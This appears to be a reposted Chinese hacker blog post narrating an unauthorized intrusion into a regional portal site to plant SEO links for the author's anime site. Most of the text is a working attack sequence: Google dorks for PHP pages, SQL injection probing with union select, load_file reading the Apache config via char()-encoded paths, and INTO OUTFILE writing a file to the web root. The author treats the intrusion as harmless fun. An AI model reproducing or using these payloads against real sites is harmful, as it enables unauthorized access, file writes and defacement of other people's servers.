天挺无聊的,打开QQ也不知道和谁扯淡,
入侵某地方门户加PR网站安全
。最近在开个动漫站,正愁没有方法提高PR,正好看到某B在XX地上线了,在网上查了下XX地的门户www.xxxxxxx.com,查了下价值。觉得还过的去(图1),就去鸟他了。
图1
个人比较喜欢日PHP,于是在GG搜索inurl:.php site:xxxxxxx.com(图2),在黑框框内发现某分站的路径,接下来就搜索了inurl:.php site:www.xxxxxxx.com,发现一个PHP的点,用and 1=1和and 1=2,然后用order by 6/*发现有6个表,再访问http://www.xxxxxxx.com/xxxx/comxxx.php?classid=206 and 1=2 union select 1,2,3,4,5,6/*,显示出“2”(图3)
图2
图3
话说之前我们不是发现一个路径吗?估计分站的服务器文件配置和主站可能一样的,所以我们试试来读下APACHE的配置文件:“/usr/local/apache2/conf/httpd.conf”,转换后放入URL里访问:http://www.xxxxxxx.com/xxxx/comxxx.php?classid=206 and 1=2 union select 1, load_file(char(47,117,115,114,47,108,111,99,97,108,47,97,112,97,99,104,101,50,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102)),3,4,5,6/*,
电脑资料
《入侵某地方门户加PR网站安全》(https://www.unjs.com)。然后搜索关键字htdocs找到目录为/www/xxxxxx.com/www/,用工具看了下,发现magic_quotes_gpc=Off。嘿嘿,这样就好了,可以用OUTFILE INTO写文件进去,提交URL为:“http://www.xxxxxxx.com/xxxx/comxxx.php?classid=206/**/and/**/1=2/**/union/**/select/**/1,2,3,4,'byyzy',6%20from user into
outfile
'/www/xxxxxx.com/www/yzy.txt'/*”这样文件就写上去了(图4)。
图4
接下来只要加上我站的连接就可以了,我只是为了PR,管理员叔叔不要怪我哦。Boku no iyaa,I’m coming.